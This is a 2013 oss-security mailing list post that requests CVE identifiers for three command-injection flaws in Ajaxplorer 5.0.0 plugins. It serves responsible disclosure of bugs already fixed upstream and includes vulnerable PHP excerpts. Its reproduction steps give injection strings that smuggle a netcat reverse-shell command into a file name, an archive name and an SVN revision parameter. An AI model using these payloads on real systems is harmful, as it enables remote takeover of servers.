[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 4 Jul 2013 10:40:01 +0200
From: "Mehrenberger, Xavier" <Xavier.Mehrenberger@...sidian.com>
To: <oss-security@...ts.openwall.com>
Subject: CVE requests for Ajaxplorer
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello,
I'd like to request CVE identifiers for three remote shell execution
vulnerabilities
I have discovered in ajaxplorer.
These vulnerabilities are public, and have been fixed by upstream (see
advisory below).
Kurt, this is the same advisory I sent you privately, describing the
same vulnerabilities.
No identifiers have been issued yet.
Thanks
=======================================
Advisory title: Several ajaxplorer 5.0.0 remote exec vulnerabilities
Product: Ajaxplorer 5.0.0 plugins
Credit: Xavier Mehrenberger, Cassidian CyberSecurity
Upstream URL: http://ajaxplorer.info/
Vulnerable version: 5.0.0 plugins and probably earlier versions
Tested: v5.0.0, June 2013
Fixed in: v5.0.1, released 2013-06-29
Public fixes:
https://github.com/ajaxplorer/ajaxplorer-core/commit/22a62840e5ac14bb389
e7f24218ef6fb20963571
Category: Remote Code Execution
Vulnerability type: [CWE-88] Argument Injection or Modification
CVE IDs: None yet
Affected plugins:
* "Power FS" action.powerfs
* "File System (Standard)" access.fs
* "Subversion Repository" meta.svn
By: Xavier Mehrenberger
Cassidian CyberSecurity
http://www.cassidiancybersecurity.com
=======================================
- ----- 1st vulnerability
Affected plugin: "Power FS" action.powerfs
Plugin URL: http://ajaxplorer.info/plugins/action/powerfs/
Plugin description: delegate various time/memory-consuming actions to
the
underlying filesystem.
Required configuration: Power FS plugin is enabled. This can be done
from the
web interface by any user with sufficient privileges.
User has to be logged in to ajaxplorer.
Steps to reproduce:
* Select one or more files
* Click More>Compress...
* Use 'a";nc 127.0.0.1 1234 -e /bin/bash;"b' as file name to execute a
command
on the server. This example command provides you with a reverse shell on
localhost:1234 (ajaxplorer installed on localhost for test purposes)
Vulnerable code sample:
- --- file plugins/action.powerfs/class.PowerFSController.php line 156
144 $archiveName = $httpVars["archive_name"];
...
149 $cmd = "zip -r \"".$archiveName."\" ".implode(" ", $args);
...
156 $proc = popen($cmd, "r");
- ---
The $archiveName variable is controlled by the attacker, and is not
escaped
before passing it to popen().
Proposed fix: properly sanitize user-controlled parameters.
- ----- 2nd vulnerability
Affected plugin: "File System (Standard)" access.fs
Plugin URL: http://ajaxplorer.info/plugins/access/fs/
Plugin description: Access to the local filesystem
Required configuration: "Real Size Probing" is set to "Yes" in File
System
plugin configuration. This option is set to "No" by default in v5.0.0,
but can
be set from the web interface by any user with sufficient privileges.
User has to be logged in to ajaxplorer.
Steps to reproduce:
* Create a new empty file
* Set its name as '$(nc 127.0.0.1 1234 -e bash)' (remove single quotes).
This
example command provides you with a reverse shell on localhost:1234
(ajaxplorer
installed on localhost for test purposes)
Vulnerable code sample:
- --- file plugins/access.fs/class.fsAccessWrapper.php, lines 443, 448,
455
440 protected function getTrueSizeOnFileSystem($file) {
442 $cmd = "stat -L -c%s \"".$file."\"";
443 $val = trim(`$cmd`);
447 $cmd = "ls -1s --block-size=1 \"".$file."\"";
448 $val = trim(`$cmd`);
453 $cmd = "ls -l \"".$file."\"";
455 $arr = explode("/[\s]+/", `$cmd`);
- ---
Line 469 is probably affected as well - executed on Windows machines,
not
tested.
The $file value is controlled by the attacker, and is not escaped before
passing it to backticks '`'.
Proposed fix: properly sanitize user-controlled parameters.
- ----- 3rd vulnerability
Affected plugin: "Subversion Repository" meta.svn
Plugin URL: http://ajaxplorer.info/plugins/meta/svn/
Plugin description: Use an SVN working copy as an ajaxplorer repository
Required configuration: The SVN plugin has to be enabled, and an
ajaxplorer
"SVN repository" has to be present. This can be done from the web
interface by
any user with sufficient privileges.
User has to be logged in to ajaxplorer.
Steps to reproduce:
* Send a forged revert_file request (ex. using burp or webscarab)
Such revert_file request get send when a user tries to revert a file
from an
SVN working directory.
* Set the 'revision' parameter to '1; nc 127.0.0.1 1234 -e /bin/bash;
echo'
(remove single quotes). This example command provides you with a reverse
shell
on localhost:1234 (ajaxplorer installed on localhost for test purposes)
Vulnerable code sample:
- --- file plugins/meta.svn/class.SvnManager.php, lines 203 and 205
196 $revision = $httpVars["revision"];
...
203 system( (SVNLIB_PATH!=""?SVNLIB_PATH."/":"") ."svn cat -r$revision
$escapedFile > ".escapeshellarg($targetFile));
204 }else{
205 system( (SVNLIB_PATH!=""?SVNLIB_PATH."/":"") ."svn cat -r$revision
$escapedFile > $escapedFile");
- ---
The $revision variable is controlled by the attacker, and is not escaped
properly.
Proposed fix: properly sanitize user-controlled parameters.
- --
Xavier Mehrenberger
EADS - Cassidian CyberSecurity - CSIRT team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)
iQEcBAEBAgAGBQJR1TSfAAoJED6sl31qxFSw77IH/0kBHwZjOzFBvyNs2Z//CtpC
BCBEI2C1jZjUClOj+s1snB+DpAfG8F1DOIw95MLUozmJ8Lcsc1n6drYKPgaGQm6W
8t5KKWniB1dCfRNGss6TyY/40soF9pAwtE7Kf3SGXz/RgLuKajOJpzU6B1OkLwoZ
2kFbCPnK9g9IOl2jJP69QZWzVcfyBKOuqmP5enXYiCsU43h5jDZvOxWjlFuaFhLk
OOV5o9CK79kSK8eoeYVlKE5DZZfJFOjvCmveSukFhH2e3oT8MRXHC/MeKrkJzHra
AvfZ6fa2ANUSFvhm377SHVs9ujGt/6FO2yfPIApUkdBYjj33Vyf4pEtIkQ755uY=
=XQ1t
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
